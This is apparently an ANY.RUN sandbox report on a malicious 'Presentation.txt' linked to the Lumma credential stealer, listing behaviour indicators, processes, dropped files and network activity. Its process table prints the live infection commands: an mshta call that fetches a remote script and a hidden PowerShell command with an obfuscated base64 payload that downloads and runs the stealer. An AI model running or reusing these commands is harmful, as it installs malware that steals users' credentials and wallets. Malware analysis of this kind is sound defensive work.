File name:

Presentation.txt

Full analysis: https://app.any.run/tasks/8053495f-9c82-4a66-9cc4-5a4318e3552f
Verdict: Malicious activity
Threats:

Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat.

Malware Trends Tracker     >>>
Analysis date: May 13, 2025, 09:41:44
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
possible-phishing
susp-powershell
arch-exec
lumma
stealer
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with CRLF line terminators
MD5:

4CD64C573DBED367D1481FCCBF3CB56F

SHA1:

863F9EB609141A6640D1844AE992A140B433C131

SHA256:

25DEEB916D6E6948EC780D9F272CD4A8117D8A503A52F04DCD3F188D5BB2751A

SSDEEP:

48:vhcDZfDSeiO4HED27BqpftP0YumCNd+Rdtm/7OSv4+z:Otf/iO4HEQB+fhSCdkKSv4i

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • LUMMA mutex has been found

      • xi.com (PID: 8076)

    • Steals credentials from Web Browsers

      • xi.com (PID: 8076)

    • Actions looks like stealing of personal data

      • xi.com (PID: 8076)

  • SUSPICIOUS

    • Possible Social Engineering Attempted

      • svchost.exe (PID: 2196)

    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • mshta.exe (PID: 4424)

    • Executes script without checking the security policy

      • powershell.exe (PID: 7348)

    • Executed via WMI

      • powershell.exe (PID: 7348)

    • Creates an object to access WMI (SCRIPT)

      • mshta.exe (PID: 4424)

    • Creates new GUID (POWERSHELL)

      • powershell.exe (PID: 7348)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 7348)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 7348)

    • The process creates files with name similar to system file names

      • powershell.exe (PID: 7348)
      • aaaaa.exe (PID: 7852)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7348)
      • aaaaa.exe (PID: 7852)

    • Starts a Microsoft application from unusual location

      • aaaaa.exe (PID: 7852)

    • Process drops legitimate windows executable

      • aaaaa.exe (PID: 7852)
      • powershell.exe (PID: 7348)

    • Starts application with an unusual extension

      • aaaaa.exe (PID: 7852)

    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 7348)

    • Searches for installed software

      • xi.com (PID: 8076)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 4424)

    • Checks proxy server information

      • mshta.exe (PID: 4424)
      • powershell.exe (PID: 7348)

    • Disables trace logs

      • powershell.exe (PID: 7348)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7348)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7348)

    • Reads the computer name

      • aaaaa.exe (PID: 7852)
      • xi.com (PID: 8076)

    • The sample compiled with english language support

      • powershell.exe (PID: 7348)
      • aaaaa.exe (PID: 7852)

    • Checks supported languages

      • aaaaa.exe (PID: 7852)
      • xi.com (PID: 8076)

    • Create files in a temporary directory

      • aaaaa.exe (PID: 7852)

    • Reads the software policy settings

      • xi.com (PID: 8076)

    • Creates files in the program directory

      • aaaaa.exe (PID: 7852)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7348)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7348)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.bs/bin | PrintFox (C64) bitmap (100)
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
133
Monitored processes
8
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start mshta.exe svchost.exe powershell.exe conhost.exe no specs sppextcomobj.exe no specs slui.exe no specs aaaaa.exe #LUMMA xi.com

Process information

PID
CMD
Path
Indicators
Parent process
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
4424"C:\Windows\system32\mshta.exe" https://2no.co/2Od3Q3 =+=0056823C:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
7348powershell.exe -w h -nop -ep un -E JABUAFcAUABNAEkAUwA9ACcAKgA5ACoANQA3ADgAKgA4ADcALwAvADcALwAvADcAMAA3ADMAMwBBADIARgAyAEYANwAwADcANQAqADIAMgBEACoAMwAqADMAKgA1ACoAMgAqADUAMwAqADMAMwAqAC8ALwAqADMAMwAqACoAMQAzADUAMwAvAC8AMwAxACoAMQAqACoAMwA4ACoANQAqADEAMwAyACoAKgAzADkAMwAqADMAOAAqADMAMwA3ADMALwAvACoAMQAqADIAKgAyACoALwAvADMALwAvADIARQA3ADIAMwAyADIARQAqAC8ALwAqADUANwAqADIARgA3ADgAKgA5ADcALwAvADIARQA3AEEAKgA5ADcAMAAyAC8ALwA3AEEAKgA5ADcAMAAzAEQAMgAyADIALwAvACoANQAqAEUANwAqADMAQQA1AC8ALwAvAC8ANQAvAC8ARAA1ADAANQBDADcAOAAqADkANwAvAC8AMgBFADcAQQAqADkANwAwADIAMgAzAEIAMgAwADIALwAvACoALwAvACoANQA3ADMANwAvAC8AMwBEAC8ALwBBACoARgAqADkAKgBFADIARAA1ADAAKgAxADcALwAvACoAOAAyADAAMgAvAC8AKgA1ACoARQA3ACoAMwBBADUALwAvAC8ALwA1AC8ALwBEADUAMAAyADAAMgA4ADIAMgA3ADgAKgA5ADcALwAvADUARgAyADIAMgAwADIAQgAyADAANQBCACoANwA3ADUAKgA5ACoALwAvADUARAAzAEEAMwBBAC8ALwBFACoANQA3ADcALwAvADcANwA1ACoAOQAqAC8ALwAyADgAMgA5ADIAOQAzAEIAMgAwAC8ALwA1ADcAOAA3ADAAKgAxACoARQAqAC8ALwAyAEQALwAvADEANwAyACoAMwAqADgAKgA5ADcAKgAqADUAMgAwADIARAA1ADAAKgAxADcALwAvACoAOAAyADAAMgAvAC8ANwBBACoAOQA3ADAAMgAwADIARAAvAC8ALwAvACoANQA3ADMANwAvAC8AKgA5ACoARQAqADEANwAvAC8AKgA5ACoARgAqAEUANQAwACoAMQA3AC8ALwAqADgAMgAwADIALwAvACoALwAvACoANQA3ADMANwAvAC8AMwBCADIAMAA1ADMANwAvAC8AKgAxADcAMgA3AC8ALwAyAEQANQAwADcAMgAqAEYAKgAzACoANQA3ADMANwAzADIAMAAyAEQALwAvACoAKgA5ACoAQwAqADUANQAwACoAMQA3AC8ALwAqADgAMgAwADIAOAAvAC8AQQAqAEYAKgA5ACoARQAyAEQANQAwACoAMQA3AC8ALwAqADgAMgAwADIALwAvACoALwAvACoANQA3ADMANwAvAC8AMgAwADIAMgAqADEAKgAxACoAMQAqADEAKgAxADIARQAqADUANwA4ACoANQAyADIAMgA5ADMAQgAyAC8ALwAqADcANwAwACoARAAvAC8AQQAvAC8ANQA3AC8ALwAvAC8ARQAyADAAMwBEADIAMAAyAC8ALwAqADUAKgBFADcAKgAzAEEANQAvAC8AKgA1ACoARAA3ADAAMwBCACoAKgA3ADUAKgBFACoAMwA3AC8ALwAqADkAKgBGACoARQAyADAANQA3AC8ALwBFACoAQQA1AC8ALwA3ADcAKgBBADcAMgAvAC8AOQAyADgAMgAvAC8AKgAqACoARAAvAC8AMgA3AEEAKgBCACoANQA3ADkAKgA1ADIAQwAyADAAMgAvAC8ANwA1AC8ALwA5ACoAMQA3ADMAKgAvAC8AMgA5ADcAQgAqADMANwA1ADcAMgAqAEMAMgAwADIALwAvACoAKgAqAEQALwAvADIANwBBACoAQgAqADUANwA5ACoANQAyADAAMgBEACoARgAyADAAMgAvAC8ANwA1AC8ALwA5ACoAMQA3ADMAKgAvAC8ANwBEADMAQgAqACoANwA1ACoARQAqADMANwAvAC8AKgA5ACoARgAqAEUAMgAwADUAOAA3ACoANQAvAC8AKgBDADcANwAyADgAMgAvAC8ANQAvAC8ANQA3ADUAMAAvAC8ARAAvAC8AOQA1ADMAMgA5ADcAQgA1ADcALwAvAEUAKgBBADUALwAvADcANwAqAEEANwAyAC8ALwA5ADIAMAAyAC8ALwA1AC8ALwA1ADcANQAwAC8ALwBEAC8ALwA5ADUAMwAyADAAMgAvAC8ANwA1AC8ALwA5ACoAMQA3ADMAKgAvAC8ANwBEADIALwAvADcANQAvAC8AOQAqADEANwAzACoALwAvADIAMAAzAEQAMgAwADIALwAvACoANQAqAEUANwAqADMAQQA1AC8ALwAqADUAKgBEADcAMAAyADAAMgBCADIAMAAyADcANQBDADcAOAAqADkANwAvAC8AMgBFADcAQQAqADkANwAwADIANwAzAEIANQA4ADcAKgA1AC8ALwAqAEMANwA3ADIAMAAyAC8ALwA1ADAAKgBEADUANQAqADgALwAvAEIAMgBFADUAMwA3ADUAKgAyADUAMwA3AC8ALwA3ADIAKgA5ACoARQAqADcAMgA4ADMAMwAyAEMAMwA1ADMAOQAyADkAMwBCAC8ALwA1ADcAOAA3ADAAKgAxACoARQAqAC8ALwAyAEQALwAvADEANwAyACoAMwAqADgAKgA5ADcAKgAqADUAMgAwADIARAA1ADAAKgAxADcALwAvACoAOAAyADAAMgAvAC8ANwA1AC8ALwA5ACoAMQA3ADMAKgAvAC8AMgAwADIARAAvAC8ALwAvACoANQA3ADMANwAvAC8AKgA5ACoARQAqADEANwAvAC8AKgA5ACoARgAqAEUANQAwACoAMQA3AC8ALwAqADgAMgAwADIALwAvACoANwA3ADAAKgBEAC8ALwBBAC8ALwA1ADcALwAvAC8ALwBFADMAQgAvAC8AMQAqAC8ALwAqAC8ALwAyAEQANQAvAC8ANwA5ADcAMAAqADUAMgAwADIARAAvAC8AMQA3ADMANwAzACoANQAqAEQAKgAyACoAQwA3ADkAMgAwADUAMwA3ADkANwAzADcALwAvACoANQAqAEQAMgBFAC8ALwA5AC8ALwBGADIARQAvAC8AMwAqAEYAKgBEADcAMAA3ADIAKgA1ADcAMwA3ADMAKgA5ACoARgAqAEUAMgBFAC8ALwAqACoAOQAqAEMAKgA1ADUAMwA3ADkANwAzADcALwAvACoANQAqAEQAMwBCADIALwAvAC8ALwAvAC8ALwAvAEUAKgA1ADcAQQAqAEEAKgBGADUAOAAqACoAMgAwADMARAAyADAANQBCAC8ALwA5AC8ALwBGADIARQAvAC8AMwAqAEYAKgBEADcAMAA3ADIAKgA1ADcAMwA3ADMAKgA5ACoARgAqAEUAMgBFADUAQQAqADkANwAwAC8ALwAqACoAOQAqAEMAKgA1ADUARAAzAEEAMwBBAC8ALwBGADcAMAAqADUAKgBFADUAMgAqADUAKgAxACoALwAvADIAOAAyAC8ALwA3ADUALwAvADkAKgAxADcAMwAqAC8ALwAyADkAMwBCADIALwAvADcAKgAqAEQANQA1ADUALwAvADIAMAAzAEQAMgA4ADIALwAvAC8ALwAvAC8ALwAvAEUAKgA1ADcAQQAqAEEAKgBGADUAOAAqACoAMgBFAC8ALwA1ACoARQA3AC8ALwA3ADIAKgA5ACoANQA3ADMAMgAwADcAQwAyADAANQAzACoARgA3ADIANwAvAC8AMgBEAC8ALwBGACoAMgAqAEEAKgA1ACoAMwA3AC8ALwAyADAALwAvAEUAKgAxACoARAAqADUAMgAwADcAQwAyADAANQAzACoANQAqAEMAKgA1ACoAMwA3AC8ALwAyAEQALwAvAEYAKgAyACoAQQAqADUAKgAzADcALwAvADIAMAAyAEQALwAvACoAKgA5ADcAMgA3ADMANwAvAC8AMgAwADMAMQAyADkAMgBFAC8ALwBFACoAMQAqAEQAKgA1ADMAQgAyAC8ALwA1ADAANwBBAC8ALwBFADUAOAAvAC8AQgAqAEUALwAvADkAMgAwADMARAAyADAALwAvAEEAKgBGACoAOQAqAEUAMgBEADUAMAAqADEANwAvAC8AKgA4ADIAMAAyAC8ALwAqADUAKgBFADcAKgAzAEEANQAvAC8AKgA1ACoARAA3ADAAMgAwADIALwAvADcAKgAqAEQANQA1ADUALwAvADMAQgA3ADMANwAvAC8AKgAxADcAMgA3AC8ALwAyADAAMgAvAC8ANQAwADcAQQAvAC8ARQA1ADgALwAvAEIAKgBFAC8ALwA5ADIAMAAzAEIAMwBCACcALgBSAGUAcABsAGEAYwBlACgAIgAvAC8AIgAsACAAIgA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA2ACIAKQA7ACQAUABtAFUAaABLAD0AKAAkAFQAVwBQAE0ASQBTACAALQBzAHAAbABpAHQAIAAnACgAPwA8AD0AXABHAC4ALgApACcAfAAlAHsAWwBjAGgAYQByAF0AKABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsADEANgApACkAfQApACAALQBqAG8AaQBuACAAJwAnADsAIAAmACAAJABQAG0AVQBoAEsALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAzACkAIAAkAFAAbQBVAGgASwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7360\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7468C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7500"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7852"C:\Users\admin\AppData\Local\Temp\aaaaa.exe" C:\Users\admin\AppData\Local\Temp\aaaaa.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Test Authoring and Execution Framework [v10.66]
Exit code:
0
Version:
10.66.2203.16002
Modules
Images
c:\users\admin\appdata\local\temp\aaaaa.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\users\admin\appdata\local\temp\te.winrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
8076C:\Users\admin\AppData\Local\Temp\15487\xi.comC:\Users\admin\AppData\Local\Temp\15487\xi.com
aaaaa.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\eef667.tmp
c:\users\admin\appdata\local\temp\15487\xi.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shell32.dll
Total events
7 472
Read events
7 469
Write events
3
Delete events
0

Modification events

(PID) Process:(4424) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(4424) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(4424) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
18
Suspicious files
14
Text files
2
Unknown types
1

Dropped files

PID
Process
Filename
Type
4424mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:904DE65ADA84EE7496820D5625E1ACFD
SHA256:2087666B27A407AFA0A5D986A952C0B17A2643883C86CFA64E7471F2672AF1D5
4424mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:5155D4762C5C38C97734D5F96FBA8C8D
SHA256:9BF01E42DA4997E13BB094A8B37AFAA43E0DBCD533114FCBF1FD536294D65AE1
7348powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yfnw1h3h.ihu.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7348powershell.exeC:\Users\admin\AppData\Local\Temp\TE.WinRT.dllexecutable
MD5:CAFA0272724F6559FB7B23AAA69614AE
SHA256:F9C2491EF29C43B7261451A705A6E55ACFBB46AA71D18A310CCD80CE793BC36D
7348powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_m5ovtd1n.yi1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4424mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751binary
MD5:F2544686B658E388DEB3F39C74F7527D
SHA256:8D7C79F74E8DF10AAED5F5EF110D35E50786D31C46746EB982AECFF3D2063412
7348powershell.exeC:\Users\admin\AppData\Local\Temp\xit.zipcompressed
MD5:B6555FA50676836CA3F51CE6A7415095
SHA256:F760C065C108E580185FE20656AFD912BB28F9DDAB9570AF9BF5A01AB8133715
7348powershell.exeC:\Users\admin\AppData\Local\Temp\aaaaa.exeexecutable
MD5:C92138E57737052DD27E45C8B4A11786
SHA256:B6BBF1BD2C7701667FF4F3DE7AC69FD696C124C88D6FF662322C237F61D48992
4424mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751binary
MD5:E192462F281446B5D1500D474FBACC4B
SHA256:F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60
7348powershell.exeC:\Users\admin\AppData\Local\Temp\TE.Common.dllexecutable
MD5:3DCA9F4F221F461D8C075992C24F6AEA
SHA256:CEC68BA5EBB3DF9DB3E5FADFD488C1F5D3BFF755C33066A79EEC255B83968EA8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
33
DNS requests
21
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4424
mshta.exe
GET
200
216.58.206.35:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4424
mshta.exe
GET
200
216.58.206.35:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
4424
mshta.exe
GET
200
69.192.161.44:80
http://x1.c.lencr.org/
unknown
whitelisted
8104
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
8104
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.216.77.41:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
5496
MoUsoCoreWorker.exe
23.216.77.41:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4424
mshta.exe
172.67.149.76:443
2no.co
CLOUDFLARENET
US
whitelisted
4424
mshta.exe
216.58.206.35:80
c.pki.goog
GOOGLE
US
whitelisted
4424
mshta.exe
162.159.140.237:443
pub-164d8d82c41c4e1b871bc21802a18154.r2.dev
CLOUDFLARENET
suspicious
4424
mshta.exe
69.192.161.44:80
x1.c.lencr.org
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
  • 20.73.194.208
  • 51.124.78.146
whitelisted
google.com
  • 216.58.206.78
whitelisted
crl.microsoft.com
  • 23.216.77.41
  • 23.216.77.28
  • 23.216.77.30
  • 23.216.77.22
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
2no.co
  • 172.67.149.76
  • 104.21.79.229
whitelisted
c.pki.goog
  • 216.58.206.35
whitelisted
pub-164d8d82c41c4e1b871bc21802a18154.r2.dev
  • 162.159.140.237
  • 172.66.0.235
unknown
x1.c.lencr.org
  • 69.192.161.44
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.14
  • 20.190.160.64
  • 20.190.160.17
  • 40.126.32.74
  • 20.190.160.132
  • 40.126.32.133
  • 40.126.32.68
  • 20.190.160.66
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] CloudFlare Public R2.dev Bucket
2196
svchost.exe
Possible Social Engineering Attempted
SUSPICIOUS [ANY.RUN] Abuse Public R2.dev Bucket
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] CloudFlare Public R2.dev Bucket
2196
svchost.exe
Possible Social Engineering Attempted
SUSPICIOUS [ANY.RUN] Abuse Public R2.dev Bucket
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Presentation.txt